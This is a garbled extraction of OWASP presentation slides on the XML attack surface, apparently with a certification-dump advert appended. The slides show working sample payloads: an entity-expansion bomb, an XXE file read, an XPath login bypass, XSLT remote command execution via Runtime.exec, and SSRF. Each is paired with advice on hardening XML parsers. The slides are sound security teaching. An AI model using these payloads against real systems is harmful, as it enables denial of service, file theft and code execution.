OWASP. XML Attack Surface. Business Analytics Security Competency Group

Size: px

Start display at page:

Download "OWASP. XML Attack Surface. Business Analytics Security Competency Group"

Jeffrey Greer
6 years ago
Views:

1 XML Attack Surface Business Analytics Security Competency Group

2 XML is Pervasive 2/32

3 XML intro Born in 1998 (see initial specifications) Data interchange format Parsers International languages support Text based Human readable DOM SAX, rooted in Ottawa (see bio) StAX Complementary technologies and standards XML Validation (DTD, XSD,...) XML Transformation (XSLT) XML Query (XQuery, XPath) 3/32

4 Is XML Secure? Nothing wrong with the standard itself Most vulnerabilities due to Libraries/Tools misconfiguration Insufficient validation of untrusted input known, reported security vulnerabilities (see CVE search) 4/32

5 XML Bomb CWE-776: Denial of service (memory exhaustion) Amit Klein, 2002 (see BugTraq) XML entity expansion <!DOCTYPE ibm [ <!ENTITY ernst128 <!ENTITY ernst <!ENTITY ernst002 <!ENTITY ernst001 <!ENTITY ernst000 ]> <ibm>&ernst000;</ibm> "pierre"> "&ernst128;&ernst128;"> "&ernst003;&ernst003;"> "&ernst002;&ernst002;"> "&ernst001;&ernst001;"> 5/32

6 Modus Operandi Attacker Vulnerable Server POST /request HTTP/ <ibm>&ernst000;</ <ibm>&ernst001;&e <ibm>&ernst002;&e <ibm>&ernst003;&e ibm> rnst001;</ibm> rnst002;&ernst002 rnst003;&ernst003 ;&ernst002;</ibm> ;&ernst003;&ernst 003;&ernst003;&er nst003;&ernst003; </ibm> 6/32

7 Demo #1: Server Crash with XML Bomb (Source code available on demand) 7/32

8 Variation: Quadratic Blowup Attack Amit Klein (see MSDN article) Uses one single entity of size 50KB Reference the entity 50,000 times Useful to bypass FEATURE_SECURE_PROCESSING protection Limits entity expansions to 100,000 (IBM) 64,000 (Oracle) <!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee"> ]> <pierre>&e;&e;&e;...&e;&e;&e;</pierre> 8/32

9 Protection DOM SAX factory.setfeature(" /xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. IS_REPLACING_ENTIT Y_REFERENCES, false); 9/32

10 External Entity Reference (XXE) CWE-611: Information Disclosure Gregory Steuck, 2002 (see BugTraq) Requires the server to include user-supplied data in the response <!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <pierre>&ernst;</pierre> 10/32

11 Modus Operandi Attacker POST /request HTTP/1.1 Vulnerable Server <pierre>[... <pierre> content of the &ernst; file on the </pierre> server...]</pierr e> HTTP/ OK Content-Type: text/xml <response> Unknown service [... content of the file on the server...] </response> 11/32

12 Demo #2: File Content Disclosure with XXE (Source code available on demand) 12/32

13 Protection DOM SAX factory.setfeature(" /xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. IS_REPLACING_ENTIT Y_REFERENCES, false); 13/32

Blind Xpath Injection ( XML Injection ) CWE-643: Abuse

User input is embedded as-is in Xpath statement

<password>i8simon</password> </user> <user>

14 Blind Xpath Injection ( XML Injection ) CWE-643: Abuse of Functionality Amit Klein, 2004 (see white-paper) User input is embedded as-is in Xpath statement <users> <user> <name>pierre</name> <password>i8simon</password> </user> <user> <name>trevor</name> <password>mee2</password> </user> </users> //users/user[name/text()= and password/text()= '' 'pierre' 'pierre oror ''=' ''='' 'i8simon' *********** '' or ''='' ]/name/text() 14/32

15 Modus Operandi Attacker Vulnerable Server POST /login HTTP/ //users/user[name/ text()= '' or ''='' and password/text()= '' or ''=''] /name/text() pierre trevor HTTP/ OK Content-Type: text/html 15/32

16 Demo #3: Blind Xpath Injection (Source code available on demand) 16/32

17 Variation: Read System Properties JAXP implementation: IBM Oracle Interesting properties: os.version user.name java.class.path sun.java.command system-property('sun.java.command') 17/32

18 Protection Input Validation. [A-Za-z0-9_\-]+ in our example. 18/32

19 Code Injection during XSLT CWE-94: Improper Control of Generation of Code When the attacker can control the XML style sheet applied to an XML document. Uses transformer engine extension capabilities <xsl:stylesheet version="1.0" xmlns:xsl=" xmlns:rt="xalan://java.lang.runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getruntime()"/> <xsl:value-of select="rt:exec($obj,'calc.exe')"/> </xsl:template> </xsl:stylesheet> 19/32

20 Modus Operandi Attacker <doc> whatever </doc> <stylesheet> malicious </stylesheet> Vulnerable Server GET /request?doc=...&stylesheet=... HTTP/ Load class java.lang.runtime 3 Call exec() method 20/32

21 Demo #4: Remote OS Command Injection (Source code available on demand) 21/32

22 Variation #1: Universal XXE Universal : you always see the entity in the response <!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <xsl:stylesheet version="1.0" xmlns:xsl=" <xsl:template match="/"> &ernst; </xsl:template> </xsl:stylesheet> 22/32

23 Variation #2: Infinite Loop <xsl:stylesheet version="1.0" xmlns:xsl=" <xsl:template name="loop"> <xsl:call-template name="loop"/> </xsl:template> 2 1 <xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template> </xsl:stylesheet> 23/32

24 Variation #3: Cross-Site Scripting (XSS) <xsl:stylesheet version="1.0" xmlns:xsl=" xmlns:xhtml=" <xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert('xss');</xhtml:script> </xsl:template> </xsl:stylesheet> 24/32

25 Protection Several ways to abuse XML Stylesheet Transforms. Users should never been able to use custom XML stylesheets. 25/32

26 Server Side Request Forgery (SSRF) CWE-601: Open Redirect, but server-to-server {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon) XML vectors: Xml external Entities (XXE) Xinclude External Doctype inclusion: <!DOCTYPE PIERRE PUBLIC "ernst" " <pierre/> 26/32

27 Modus Operandi Attacker Vulnerable Server Internal Service 1 POST /request HTTP/1.1 Content-Type: application/xml Content-Lenght: 666 <?xml version= 1.0?>... whatever 2 27/32

org/ xml/features/disallow-doctype-decl",

28 Protection DOM SAX factory.setfeature(" xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. SUPPORT_DTD, false); 28/32

29 Variation: Exotic Java URL Handlers {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE ) 29/32

30 Conclusions Always configure your XML parsers to disallow Doctype. From a server's perspective, clients should not be able to define the grammar of the request anyway Secure Processing Flag is not enough Preventing external entity expansion is not enough XPath: validate user's input XSLT: avoid at any cost Always apply Java patches from vendors 30/32

31 Pierre Ernst 10 years as Software Developer 5 years as Penetration Tester 750+ vulns Manual Code Review Manual Black Box Testing Java, XML, Open Source, pierre.ernst@gmail.com 31/32

32 Questions & Answers 32/32

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year PASS4TEST IT Certification Guaranteed, The Easy Way! \ http://www.pass4test.com We offer free update service for one year Exam : 000-141 Title : XML and related technologies Vendors : IBM Version : DEMO